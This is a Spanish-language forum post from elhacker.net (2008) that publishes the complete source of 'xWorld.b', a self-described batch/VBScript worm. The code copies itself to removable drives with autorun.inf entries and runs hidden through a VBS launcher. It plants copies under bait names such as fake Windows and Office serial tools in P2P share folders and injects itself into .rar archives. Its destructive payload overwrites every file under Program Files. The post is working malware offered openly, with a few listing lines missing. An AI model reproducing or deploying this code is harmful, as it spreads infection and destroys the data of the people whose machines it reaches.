Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: The Shadow en 7 Julio 2008, 23:38 pm


Título: [virus][batch][vbs] xWorld.b
Publicado por: The Shadow en 7 Julio 2008, 23:38 pm
Código
  1. :: Nombre: xWorld.b
  2. :: Codeado por: Shadow; tshadow; The Shadow
  3. :: Fecha: 14/04/08
  4. :: Info: Worm de propagacion por USB, P2P y .rar . . .
  5. :: Payload: El payload es aleatorio y al ejecutarse daña todos los archivos
  6. ::   del directorio ^%programfiles^%
  7. @echo off
  8. goto %1_
  9. :_
  10. set a="%temp%\xw.bat"
  11. echo set shell = CreateObject("wscript.shell") > "%temp%\xwr.vbs"
  12. echo shell.run "cmd /c %a% xc", vbHide >> "%temp%\xwr.vbs"
  13. copy %0 %a%>nul
  14. start "%temp%\xwr.vbs"
  15.  
  16. :xc_
  17. for %%v IN (D F G H I J K L M N O P Q R S T U V W X Y Z) do call :cmp %%v
  18. call :p2p
  19. if /I %random:~1,1% lss 5 goto wrm
  21.  
  22. :cmp
  23. if exist "%1:" (
  24. 	copy %a% "%1:\xw.bat">nul
  25. 	echo [autorun] > "%1:\autorun.inf"
  26. 	echo open=xw.bat >> "%1:\autorun.inf"
  27. 	echo shellexecute=xw.bat >> "%1:\autorun.inf"
  28. 	echo shellexecute=xw.bat >> "%1:\autorun.inf"
  29. 	echo shell\explorar\command=xw.bat >> "%1:\autorun.inf"
  30. 	echo shell\explorar=^&Explorar >> "%1:\autorun.inf"
  31. )
  32. goto :EOF
  33.  
  34. :wrm
  35.  
  36. cd "%programfiles%"
  37. dir /B > %homedrive%\dir.txt
  39.  
  40. :worm
  41. set target=%1
  42. cd "%target%"
  43. for %%e in (*.*) do echo xWorld by Shadow>%%e
  44. cd "%programfiles%"
  45. goto :EOF
  46.  
  48. for /f "tokens=* " %%a in (%homedrive%\dir.txt) do call :worm "%%a"
  50.  
  51. :p2p
  52. set a="%temp%\xw.bat"
  53. if exist %windir%\t.rar (del %windir%\t.rar)
  54. type %0>op.bat
  55. set o="%systemdrive%%~p0op.bat"
  56. cd "%systemdrive%%~p0"
  57. echo eMule\Incoming\ > %windir%\yer.t
  58. echo Shareaza\Downloads\ >> %windir%\yer.t
  59. echo BearShare\Shared\ >> %windir%\yer.t
  60. echo EDONKEY2000\incoming\ >> %windir%\yer.t
  61. echo LimeWire\Shared\ >> %windir%\yer.t
  62. echo Path_msn_Emoticonos > %windir%\jer.t
  63. echo sms_gratis >> %windir%\jer.t
  64. echo polifonicos_free >> %windir%\jer.t
  65. echo Microsoft_Office_2007_all_serials >> %windir%\jer.t
  66. echo Windows_Vista_activation_tool >> %windir%\jer.t
  67. echo Windows_Vista_all_serials >> %windir%\jer.t
  68. echo MSN_hack_codes >> %windir%\jer.t
  69. set rc=1
  70. set r="%programfiles%\WINRAR\WinRAR.exe"
  71. %r% a %windir%\t.rar %o%
  72. if not %errorlevel%==9009 set rc=0
  73. goto fr
  74. :fr2
  75. set uno=%1
  76. for /F "tokens=* delims=" %%g in (%windir%\jer.t) do (
  77.          if %rc%==0 (
  78.             @copy /y %o% "%%g.bat"
  79.            cls
  80.            ping -n 2 localhost > nul
  81.            %r% a "%%g.rar" "%%g.bat"
  82.          )
  83. )
  84. goto :EOF                                  
  85. :fr
  86. for /F "tokens=* delims=" %%a in (%windir%\yer.t) do (
  87.          if exist "%programfiles%\%%a" (
  88.             cd "%programfiles%\%%a"     
  89.             for %%e in (*.rar) do (
  90.                @copy /y %o% "%%~ne.bat"
  91.               cls
  92.               ping -n 2 localhost > nul
  93.               %r% a "%%e" "%%~ne.bat"
  94.             )      
  95.          call :fr2 %%a
  96.           )
  97. )
  99. cd %windir%
  100. del *.t
  101. cd "%systemdrive%%~p0"
  102. del op.bat
  103. goto :EOF
(http://)


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines